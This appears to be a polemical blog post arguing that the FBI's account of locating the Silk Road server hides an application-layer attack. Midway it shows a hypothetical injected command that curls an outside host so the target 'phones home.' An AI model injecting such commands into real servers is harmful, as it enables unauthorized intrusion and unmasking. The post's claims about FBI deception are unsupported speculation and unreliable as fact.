A few hours ago Wired published details of the FBI’s rebuttal to the previously filed Ross Ulbricht defense motion that proffered the State’s case necessarily rested on evidence obtained from illegal searches(read: NSA dragnetting). The gist:
In the latest filing, however, former FBI agent Christopher Tarbell counters Ulbricht’s defense by describing just how he and another FBI agent located the Silk Road server in June of last year without any sophisticated intrusion: Instead, he says, they found a misconfiguration in an element of the Silk Road login page, which revealed its internet protocol (IP) address and thus its physical location.
As they typed “miscellaneous” strings of characters into the login page’s entry fields, Tarbell writes that they noticed an IP address associated with some data returned by the site didn’t match any known Tor “nodes,” the computers that bounce information through Tor’s anonymity network to obscure its true source. And when they entered that IP address directly into a browser, the Silk Road’s CAPTCHA prompt appeared, the garbled-letter image designed to prevent spam bots from entering the site.
The actual technical claim: Arbitrary HTTP Posts to the login form action leaked the Server’s Internet Protocol Address in the Response Headers and/or data payload.
Probability of said claim: Assuming Ulbricht(and the chain of ownership that preceded him) not to be idiots of the first order, ~0. The only likely “misconfiguration” would be the typical default configuration, which is to “leak” the web server and OS type/version in the response headers.
If we assume the FBI letter to be a half-truth, which frankly is not necessarily a reasonable presumption to make(as opposed to, say, the outright lie), we can ascertain a more accurate technical translation:
We sent a malicious string in the request body of a login submission to inject an executable code payload, $ curl http://laundry.forensics.fbi.gov, which essentially allowed to us to perform a remote drive-by phone home on the target.
Now, if we assume the half-truthiness of the FBI in this matter, we can thusly deduce a methodology of counter-attack by US intel organs against network obfuscation techniques–namely directly attacking the target at the application layer. In other words, the use of buffer overflow exploits(maybe zero-day or not) on the target itself to perform drive-by phone homes, or in a more sophisticated attack, to install a wiretap implementation.
Going forward, one has to assume that the use of “cyber-hacking” as means to facilitate a court-approved wiretap will be deemed legal in much the same way breaking into your property to install the old-fashioned wiretaps was deemed legally proper. Of course, I would be remiss not to point out that the legal sanctification of State hacking by organs of the justice department provides a very convenient laundromat for laundering the legality of any data collected by the 3-hop graphical dragnet(read: NSA).
Finally, it should be noted that it’s not surprising the State would eventually seize on this vector of attack. Since 1988(the infamous morris worm), it is been well-known that the weakness of the internet was not in the layered protocol design itself but in the client-server software implementation of the protocol standards. In particular, the c and c++ languages are susceptible to memory violations in string operations against arbitrary data length, resulting in access violations that can produce malicious results if the violating data is carefully formatted to do exactly that. In a sense, it is enough a problem that it could have killed the internet from the start if not for a sort of spontaneous, heuristic security best practices regime that arose that limited the problem of rogue actors to a tolerable one.
But if the heuristic law saved the internet, it is the “rule of law” that will surely kill it(in terms of being a utopian instrument). For it is the latter which turns software vulnerabilities into a primary means of both wiretapping targets and laundering graphical dragnets, reminding us, once again, that the State is indeed its own agency and its preservation best executed by a type of competitive agency of invasion of the body snatchers.